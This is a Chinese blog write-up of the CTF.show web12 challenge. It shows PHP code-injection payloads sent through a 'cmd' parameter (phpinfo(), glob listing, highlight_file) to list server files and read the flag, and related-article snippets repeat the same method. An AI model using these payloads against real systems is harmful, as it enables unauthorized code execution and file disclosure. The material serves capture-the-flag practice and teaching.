CTF.show:web12

最新推荐文章于 2024-05-28 12:35:35 发布
最新推荐文章于 2024-05-28 12:35:35 发布
阅读量374 收藏
点赞数
分类专栏: CTF.show CTF_Web_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46230755/article/details/112682845
版权

右键查看源代码
在这里插入图片描述
有提示,试一下cmd=phpinfo();
在这里插入图片描述
出现回显,采用glob通配符命令得到文件名

php的函数glob(); glob() 函数返回匹配指定模式的文件名或目录。
举个例子:
glob("") 匹配任意文件
glob(".txt")匹配以txt为后缀的文件

有了这个方法我们先把当前目录下所有的文件找出来看看有没有可用的。
输入?cmd=print_r(glob("*"));打印出了如下文件
在这里插入图片描述
尝试进入那个很长的php文件
利用highlight_file函数

/?cmd=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');

在这里插入图片描述
得到flag

FW_ENJOEY
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf.lib:somectf文件
04-09
标题中的“ctf.lib:somectf文件”可能指的是某个CTF赛事中使用的库或者工具,具体到这个例子中,可能是参赛者或者组织者用于比赛的一份资源库,名为“ctf.lib”,其中包含了某个特定的CTF挑战,可能是安全漏洞的模拟...
ctf.rip:CTF.RIP Jekyll静态网站
04-04
ctf.rip-来自捕获赃物的CTF编写 此存储库包含ctf.rip网站的Jekyll源,该源通过构建Jekyll站点,然后将生成的_site/路径部署到_site/进行部署。 生产网址: : 要添加帖子: 将新的markdown文件添加到_posts/ 用...
ctfshow-web12
m0_73303597的博客
11-24 678
自用
ctfshow-WEB-web12( 利用代码执行漏洞读取敏感文件)
热门推荐
wangyuxiang946的博客
09-06 1万+
ctf.show WEB模块第12关是一个代码执行漏洞, flag藏在根目录下的一个文件中, 读取文件内容接口过关 进入页面后, 只有一句话 where is the flag? 按照以往的经验, 线索肯定就藏在前端页面的源代码中 右键检查或者按F12, 进入开发者模式, 或者直接右键查看网页源代码, 源码的注释中提示了 cmd, 是在暗示我们利用代码执行漏洞 传入cmd参数, 验证一下代码执行漏洞 ?cmd=phpinfo(); 成功显示出php信息, 说明...
【CTF Web】CTFShow web12 Writeup(RCE+PHP+代码审计)
最新发布
HEX9CF的技术博客
05-28 354
1阿呆不慌不忙的拔掉自己所有的菜,以后自己就不会菜死了。
CTF show WEB12
羽的博客
02-18 3077
题目地址:https://ctf.show/ 打开网站没有发现可用的注入点,应该不是注入了,直接看源码,发现提示?cmd=。 在网站上输入?cmd=phpinfo();有回显,猜测源码中应该为eval($_GET['cmd']); 在eval执行漏洞中我们可以查看网页的源代码。我们输入 ?cmd=highlight_file("index.php");成功显示网站源码。 这里再介绍一个php的函...
CTFSHOW系列-web12(信息收集-网站公开信息泄露)
siu~
11-24 654
CTFSHOW系列解题思路
网络安全未来十年会很吃香吗?跟当年的Java开发比如何?
QXXXD的博客
02-02 937
网络安全入门到底是先学编程还是先学计算机基础?
ist的matlab代码-darkarmy-ctf.github.io:darkarmy-ctf.github.io
05-26
Army是一支由CTF组成的国际团队,只是一个具有良好安全意识的普通团队,同时也是努力工作的网络安全爱好者。 CTF和黑客机器的使用 DarkCTF即将推出... DarkArmy的我们正在为那里的所有黑客组织一个Capture The Flag...
国科大web安全中期CTF.pdf
11-22
国科大web安全中期CTF 在这篇文章中,我们将探讨国科大web安全中期CTF的相关知识点。 一、Web安全基础知识 在开始之前,让我们先了解一些基本概念。Web安全是指保护Web应用程序免受恶意攻击和未经授权的访问的...
jopraveen.github.io:CTF 网站
08-04
综上所述,"jopraveen.github.io:CTF 网站" 主要涵盖了 Web 开发的多个方面,包括前端开发、后端编程、数据库设计、安全策略以及网站部署。了解这些知识点有助于我们理解和参与类似项目的开发。
CTFshow-web-web12
qq_68581192的博客
10-20 81
highlight_file()函数可以用于将一个PHP文件的代码高亮显示,并输出到页面上或者保存到文件中。利用burpsuite进行抓包,发现是get传参。glob()函数返回匹配指定模式的文件名或目录。glob(“.txt”)匹配以txt后缀的文件。我们使用高亮函数,将长的文件显示一下。我们将当前目录下的文件打印出,输入。php中有个函数glob();glob(“”)匹配任意文件。尝试远程代码执行,传入参数。查看源代码,发现有个提示。
ctfshow_web12
m0_72399197的博客
04-29 121
说明可以进行传参,先试试phpinfo,发现显示,说明cmd传参执行php命令,highlight_file()查看index.php源码,在用和php函数glob() 函数返回匹配指定模式的文件名或目录。执行命令,查找文件,发现*.php,查看文件内容是flag。glob(‘*.txt’)匹配以txt后缀的文件。进入页面后空白,点击查看源码:hit:cmd=glob(‘*’)匹配任意文件。
CTF-show WEB入门--web12
m0_73912575的博客
01-03 356
CTF-show WEB入门--web12
ctfshow web10-12
qq_61988806的博客
12-09 1152
ctfshow web10-12
CTFshow Web1 - Web12
rumil的博客
07-01 535
使用工具HackBar,查看存储当中的信息,找到cookie信息,发现session值,已经给了我们值,但是我们不知道session值对应的password是多少,所有可以给他清空,密码也清空。发现该站点给了我们密码,但是观察源码当中发现还是过滤掉了很多的关键字,双写也无法绕过,注意看密码处,跟session做比较,我们可以修改session值,来绕过。拿到题目,我们打开文章列表依次查看,观察url信息,发现信息在url当中,可能存在sql注入,尝试注入。发现不能正常的回显,出现错误。
刷题之旅第33站,CTFshow web12
cc菜的一批
02-17 640
感谢ctf show平台提供题目 F12查看一下源代码,得到了提示。 既然提示了cmd=,那么可能后端代码中存在 eval() 或者exec()等可以执行命令的代码。 尝试提交,我们看到了php的配置信息。 ?cmd=phpinfo(); 使用glob通配符命令,提交命令,得到了一个php文件名。 ?cmd=print_r(glob("*.*")); 使用文件高亮命令,读出这个文件的PH...
CTFshow_web入门_信息收集(web1-20)
monster663的博客
01-22 1416
写了好多题一直没有及时总结和反思,CTF也停了很长一段时间没学习了,现在到了寒假终于有时间了,于是又重新写了一遍,也当是复习了,就把解题过程都放到这里了 web1 f12查看源码 看到注释里的flag web2 无法查看源码 1.由于第一题我按了f12,所以访问这题的时候默认看到了源码,得到flag 2.在网址前面加 view-source: 3.直接保存html源码到本地,Firefox下直接按Ctril+s,再查看源码 web3 直接burp抓包,看到Flag web4 提示robots,访问rob
(WEB)ctfshow_web12 【glob(‘*‘)】
weixin_40103894的博客
11-22 222
(WEB)ctfshow_web12 【glob('*')】
ctf.show_web5
10-22
ctf.show_web5是一个CTF比赛中的WEB模块第5关,需要传递两个参数v1和v2,要求v1必须是纯字母字符串,v2必须是数字或数字字符串,并且两个参数的md5值必须相等。可以利用md5的0e漏洞进行绕过。具体来说,可以构造一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值